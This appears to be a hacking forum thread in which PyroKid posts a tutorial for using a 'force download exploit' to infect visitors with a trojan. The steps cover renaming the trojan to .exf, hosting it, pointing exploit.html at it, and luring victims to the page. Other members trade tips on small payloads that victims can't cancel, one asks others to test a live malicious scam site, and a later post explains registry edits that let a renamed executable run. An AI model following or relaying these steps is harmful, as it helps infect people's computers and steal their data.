Force Download Exploit ***PUBLIC RELEASE!***

[PyroKid]

I got quite a few messages asking how to run this thing so I made a tutorial for you to follow.

You need to download the program (duh). Now you need a site. I suggest http://lycos.co.uk because it's better then tripod . Sign up for an account there. Before uploading your trojan change the extension (.exe) to .exf (this is important). Now upload your trojan. It should be something small (around 10-30kb so they wont have enough time to press cancel. Thats why netdevil isnt a great choice). Now go back to the zip file and open exploit.html in notepad. You need to make the following adjustments:

1. Scroll down to where you see DownloadURL="http://url-to-program-with-extension-changed-from-exe-to-exf";

2. Change http://url-to-program-with-extension-changed-from-exe-to-exf to http://members.lycos.co.uk/[lycosmembername]/[yourtrojan].exf (change the values in the little square parenthesis things)

You're done with the adjustments. Now you need to upload your html file. To make this work you should of course rename it from exploit.html to something less obvious. The best choice is index.html so that someone can visit http://members.lycos.co.uk/[lycosmembername] and see the page rather then goto http://members.lycos.co.uk/[lycosmembername]/checkthisout.html and see the page. Now finish uploading your html file. Now just think up some story to get the victim to visit your page and BAM hes infected!

There that was easy, wasn't it?

 

[cameltozis]

Korritke is this kind of acc.t stealing shit?????
am i right??? cuz i didn't get wut's this 4

 

[Korittke]

its for anything you want. maybe read the whole topic again.

 

[PyroKid]

yeah the main idea of the topic is usually on page one, post one
:wasted :mallet :hbut :crackin

 

[yoc_influenced68]

how do i get it off without the person canceling the download?

 

[Korittke]

use a smaller file

 

[yoc_influenced68]

its only a 40 kb file

 

[PyroKid]

is the download starting? if not make sure the file is .exf

 

[yoc_influenced68]

it is starting its just they cancel it......

 

[PyroKid]

then they must have a slow modem or something.

 

[yoc_influenced68]

lol i should use a key logger or a trojan but i dont get how to set em up really and that post confused the hell out of me im doin it with a drop hack..

 

[heaven_earth]

how can you tell that they are cancelling it?

 

[tradewindrider]

can someone elaborate on making the .exf extension, i dont want to f-up the registry with my carelessness. i already have an .efx extension in the _ROOT but i dont know how to edit it to change the 00 01 01 00 values

 

[heaven_earth]

Hey I made i site with it, and i also put a link to my other scam site on it so if it dosent work my scam site will popup anyway.

can someone who know about it test it for me and tell me if it is done right www,newd2duper,cjb,net (change the "," to ".")

It dosnet work on my pc (windows me , Ie 6.0) but i hope it will work on other pc's so could someone plz test??

 

[TweaK]

hey I love you too! wee!

 

[Turkey]

heaven_earth i went on your site and my anti virus detected malicious script of something. However i don't know if it stoped it downlaoding or not. Can u tell me what file it is and where it downlaods to plz?

 

[tradewindrider]

haha, turkey thats pretty stupid going to a site like that knowing what it could do. heaven is probably stealing all your credit card # and selling your cdkey on ebay now, or maybe not. if he used netdevil then the trojan should be in C:\WINDOWS\SYSTEM named kernel32.dil i think. you might go there and see one named kernel32.dll and one thats just kernel32(virus) because you can hide extension. if both of them say kernel32.dll then right click one of them and and click properties and if the file says it was created yesterday its the trojan but windows won't let you delete it because it will say copy protected or in use so you have to kill the process which is also kernel32.dll, so kill both or the one that has .dil extension and then you can delete it. but he might have just uploaded it to a different directory or uploaded another server, in which case reformating is a good idea or you can just ask him, btw what windows are you using?

 

[tradewindrider]

Originally posted by riCetasteyummy
wow...great job !!! I can't believe you just graduated from middle school...lol

wow... great job !!! I cant believe how much useless info you have to contribute ...lol

anyone know how to make .exf extension in the registry? and how to change trojan extension to .exf?

 

[Turkey]

I did a virus scan and it found an infected file in my downloads folder. It was some kind of notepad file and i deleated it? Will i be safe now?

btw im using windows ME

 

[PyroKid]

tradewindrider heres how you create an extension (this will make a file similar to a .exe file):
first you create a key in the HKEY_CLASSES_ROOT (HKCR) called .xyz that will be our extension. now for the default you set it at xyzfile. that will point to our settings. now create a key in HKCR with the name xyzfile. in xyzfile, create a key called shell. in that create a key called open. in that create a key called command. set the default to "%1" %* (that includes the quotes). this will cause the file to open with itself calling itself with the given command parameters. now just rename a .exe file to .xyz and your set. if you dont know how to do this, goto your msdos command prompt and type ren yourfile.exe yourfile.xyz and press enter. now you can open your.xyz file and it will run. playing around with the registry can screw you up but not if you know what your doing. just using common sense will probably keep you 99.9% safe from messing up.